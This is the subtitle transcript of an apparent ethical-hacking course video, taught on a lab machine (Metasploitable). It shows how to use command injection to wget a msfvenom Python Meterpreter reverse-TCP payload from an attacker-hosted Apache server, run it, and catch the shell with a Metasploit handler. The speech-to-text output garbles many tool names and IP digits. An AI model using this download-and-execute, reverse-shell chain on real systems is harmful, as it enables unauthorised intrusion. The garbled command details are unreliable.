1
00:00:00,270 --> 00:00:07,800
OK, so we've covered command injection, but you can combine this vulnerability with other tools as

2
00:00:07,800 --> 00:00:08,060
well.

3
00:00:08,490 --> 00:00:15,060
For example, in the last video we managed to establish connection using netiquette and command, addiction

4
00:00:15,060 --> 00:00:15,720
and vulnerability.

5
00:00:16,140 --> 00:00:22,380
But we can improve this by injecting a different payload, such as an interpreter shell or a reverse

6
00:00:22,380 --> 00:00:24,170
shell that we coded in Python.

7
00:00:24,960 --> 00:00:27,140
The process of doing that is the same.

8
00:00:27,150 --> 00:00:33,330
So I will show you how to send an interpreter payload to the target and make it execute with command

9
00:00:33,330 --> 00:00:33,850
injection.

10
00:00:34,710 --> 00:00:36,010
Why would we want to do this?

11
00:00:36,420 --> 00:00:39,870
Well, we always want to have the best payload possible.

12
00:00:40,200 --> 00:00:46,800
So why would we use Netcare when Mr. Peter gives us a lot more useful options to run on the target system?

13
00:00:47,620 --> 00:00:54,370
And to do all of that here, the steps that we must perform, we must first create the payload appropriate

14
00:00:54,370 --> 00:01:01,480
for our target, then we must download that payload to our target machine with the help of command injection

15
00:01:01,480 --> 00:01:02,110
motability.

16
00:01:02,290 --> 00:01:08,850
And at last, we must execute that payload also with the help of command injection vulnerability.

17
00:01:09,520 --> 00:01:11,360
So sounds pretty simple, right?

18
00:01:12,010 --> 00:01:14,920
Let's figure out what payload we should create first.

19
00:01:15,400 --> 00:01:19,600
So to create payload, we need to figure out what do we know about our target?

20
00:01:20,170 --> 00:01:27,340
Well, we know that Anticipatable is a Linux 32 bit machine so we can create a Linux Metropia their

21
00:01:27,340 --> 00:01:27,760
payload.

22
00:01:28,240 --> 00:01:31,700
But for this case, I like Python payload a lot better.

23
00:01:32,170 --> 00:01:34,360
So let's create a python method.

24
00:01:34,360 --> 00:01:35,260
Better shell.

25
00:01:36,270 --> 00:01:42,530
Great thing about Linux systems is it comes default with Python, so Python payload is something that

26
00:01:42,530 --> 00:01:47,290
we can execute on our target without them having to install any additional software.

27
00:01:48,050 --> 00:01:52,390
Let's create it real quick so we'll never get to my desktop directory.

28
00:01:52,400 --> 00:02:00,320
And here I will type MSF one on dash B and double specified that we want to create Python interpreter

29
00:02:00,800 --> 00:02:03,200
slash reverse DCP.

30
00:02:04,240 --> 00:02:10,060
The host is going to be our IP address, so let's check it out real quick.

31
00:02:12,400 --> 00:02:20,980
It is funny to the one that one that nine copied and pasted right here for the outport, we can use

32
00:02:20,980 --> 00:02:29,860
Port six thousand, for example, and we are going to output this to arrows into Testor, that P y.

33
00:02:30,160 --> 00:02:33,370
And I just named the payload tester, but feel free to name it.

34
00:02:33,370 --> 00:02:34,800
Anything that you want.

35
00:02:35,320 --> 00:02:39,130
I will press enter here and this will create our python payload.

36
00:02:40,010 --> 00:02:46,280
Let me go right here over this, and while this is creating make sure that your purpose it is started

37
00:02:46,280 --> 00:02:54,440
up, also make sure that your intercept is turned off and start up your Firefox and your anticipatable

38
00:02:54,560 --> 00:02:55,370
virtual machine.

39
00:02:56,130 --> 00:03:01,850
OK, so once you do that here in just a few seconds, our payload should be done.

40
00:03:02,870 --> 00:03:08,930
And here it is now that we got a payload created, we must figure out how can we deliver it to the target

41
00:03:08,930 --> 00:03:09,360
system?

42
00:03:09,950 --> 00:03:16,130
Of course we will do that using the command injection, but even then, the target must be able to download

43
00:03:16,130 --> 00:03:17,960
our payload from somewhere.

44
00:03:17,960 --> 00:03:18,380
Right.

45
00:03:18,800 --> 00:03:23,720
For this, we're going to use Apache Web server and host our payload.

46
00:03:23,720 --> 00:03:29,120
Their Apache comes with clinics already so we can make it run real quick.

47
00:03:29,450 --> 00:03:35,630
To do that, we must first type pseudo and then service Apache to start.

48
00:03:36,200 --> 00:03:37,970
It will ask us for the password.

49
00:03:37,970 --> 00:03:42,060
We input the password and this will start our Apache to Web server.

50
00:03:42,620 --> 00:03:43,460
What does this mean?

51
00:03:43,640 --> 00:03:52,340
Well, this means that any file that is hosted inside of the HTML directory in our clinics will be hosted

52
00:03:52,340 --> 00:03:55,500
on our Web page to anyone that visits our IP address.

53
00:03:56,210 --> 00:04:04,730
Let's first of all, visit that directory, see if it goes for w w w html type here.

54
00:04:04,910 --> 00:04:12,470
And we got the text from some previous video which we can delete straight away, and this might require

55
00:04:12,890 --> 00:04:13,750
food privileges.

56
00:04:13,850 --> 00:04:20,540
So let us just enter through the accounts to the you and let's delete this shell data.

57
00:04:21,140 --> 00:04:26,180
And now our directory is empty, so no files are being hosted on our web server.

58
00:04:26,690 --> 00:04:32,960
Let's copy our Testor, which in my case is in my home directory, Mr. Hacker and Desktop Tester that

59
00:04:32,960 --> 00:04:38,090
PBI and we want to copy it inside of our W, W, W and HTML.

60
00:04:39,780 --> 00:04:46,410
And now, if we were to go to our clinics machine and visit the IP address of my clinics, which is

61
00:04:46,420 --> 00:04:53,730
192, that 168 ad funded nine, we are going to see this page that has this file available to download.

62
00:04:54,560 --> 00:04:54,990
Great.

63
00:04:55,440 --> 00:04:59,590
All we are left to do right now is to execute this file on target system.

64
00:05:00,360 --> 00:05:04,200
Let's go to our command ejection page on our metastable.

65
00:05:05,370 --> 00:05:08,850
And to do that, we visit the IP address on Anticipatable Navigate.

66
00:05:08,850 --> 00:05:16,860
To do all of this, we already know let us enter username and password and go to the command injection.

67
00:05:16,860 --> 00:05:21,600
But before we do that, change the security level to either low or medium.

68
00:05:22,920 --> 00:05:28,970
Once we do that inside of the command ejection, we can execute the commands as from the previous video.

69
00:05:29,400 --> 00:05:35,880
So if I type right here when I do that, once you see that one, that one and dot and comma and then

70
00:05:35,910 --> 00:05:43,310
else after it, it will ping the IP address and it will also print out the contents of that directory.

71
00:05:43,560 --> 00:05:48,420
But we don't want to ping every time we can just type dot and comma, which will specify that we want

72
00:05:48,420 --> 00:05:51,740
to enter a next command and we can just type callouses after it.

73
00:05:51,750 --> 00:05:57,660
And this will just give us an output of the command and we will have to wait for the command to finish.

74
00:05:58,500 --> 00:06:05,160
Now let's download our payload using W get command and W get is something that you can run from a terminal

75
00:06:05,160 --> 00:06:09,930
in order to download a specific file from the page or link that you specify.

76
00:06:10,560 --> 00:06:12,990
Let me show you inside of terminal first.

77
00:06:13,320 --> 00:06:20,700
So right now I'm inside of the slash home slash Mr. Hacker directory and I don't have the tester pie

78
00:06:20,700 --> 00:06:27,180
right here, but if I run the command w get in then one to the 168 at one that nine, which is the IP

79
00:06:27,180 --> 00:06:32,070
address of clinics and then testor that pie with this link.

80
00:06:32,070 --> 00:06:39,510
We are accessing this page right here and this file right here, which will tell our terminal that we

81
00:06:39,510 --> 00:06:41,340
want to download that file.

82
00:06:41,370 --> 00:06:46,560
If I press enter it will download Tester the API and if I type Altez once again.

83
00:06:46,980 --> 00:06:51,480
Now we have tested that pivo inside of our home and Mr. Hacker directory.

84
00:06:52,340 --> 00:06:59,600
We want to do the same thing on our target machine, so to do that, we can use DOT comment to specify

85
00:06:59,600 --> 00:07:08,660
the next comment and type the same comment w get one or two of the 168 at nine slash tester dot by.

86
00:07:09,590 --> 00:07:10,790
I press submit.

87
00:07:11,600 --> 00:07:18,650
And if I run the last comment once again, now we have one additional file, which is our Paillot.

88
00:07:19,770 --> 00:07:24,810
So it is there it is on the target machine right now with the help of command injection.

89
00:07:25,760 --> 00:07:30,450
The last step we have to do is to set up a listener inside the MSF council.

90
00:07:30,830 --> 00:07:35,540
Let's do that real quick and I have to set up a listener.

91
00:07:35,720 --> 00:07:37,460
We must execute our payload.

92
00:07:38,470 --> 00:07:42,730
And here is the massive console we are already familiar with setting up of the listener.

93
00:07:42,760 --> 00:07:50,890
We are going to use exploit multi handler and we need to set the payload to be python interpreter,

94
00:07:52,900 --> 00:07:55,950
reverse underscore TCP.

95
00:07:56,740 --> 00:08:02,830
If I show options, all we want to do is set the host and outport and that will be the IP address of

96
00:08:02,830 --> 00:08:06,640
clinics and the airport will be six thousand.

97
00:08:06,790 --> 00:08:10,180
The same options that you specified inside of MSF.

98
00:08:11,380 --> 00:08:17,320
Then I will run this and all we are left to do right now is to execute this test to the DPI with the

99
00:08:17,320 --> 00:08:18,600
help of command injection.

100
00:08:18,610 --> 00:08:19,930
So let's see how we can do that.

101
00:08:20,590 --> 00:08:27,400
If I type dot and comma and python tester dot p press enter.

102
00:08:28,460 --> 00:08:34,280
This page will load and these are good news because that would most likely mean that we got the interpreter

103
00:08:34,280 --> 00:08:36,920
shall opened with the help of Pilton.

104
00:08:37,160 --> 00:08:44,270
We executed our Python program on the target machine and it opened our Metropia shell where we can execute

105
00:08:44,510 --> 00:08:45,400
various commands.

106
00:08:45,410 --> 00:08:52,040
As usual, we can run help command to see what else we can execute and we can basically perform post

107
00:08:52,040 --> 00:08:54,100
expectation that we already covered.

108
00:08:54,740 --> 00:08:55,150
Great.

109
00:08:55,370 --> 00:09:00,920
So this is just another way that you can use command ejection to your advantage to spawn a better payload

110
00:09:00,920 --> 00:09:03,950
than just the simple Netcare command execution.

111
00:09:04,490 --> 00:09:08,060
So you can try to test this with our python payload if you want.

112
00:09:08,960 --> 00:09:14,240
Great, now that we cover the command injection vulnerability in the next video, we are going to go

113
00:09:14,240 --> 00:09:16,890
into cross site scripting vulnerability.

114
00:09:17,480 --> 00:09:18,020
See you there.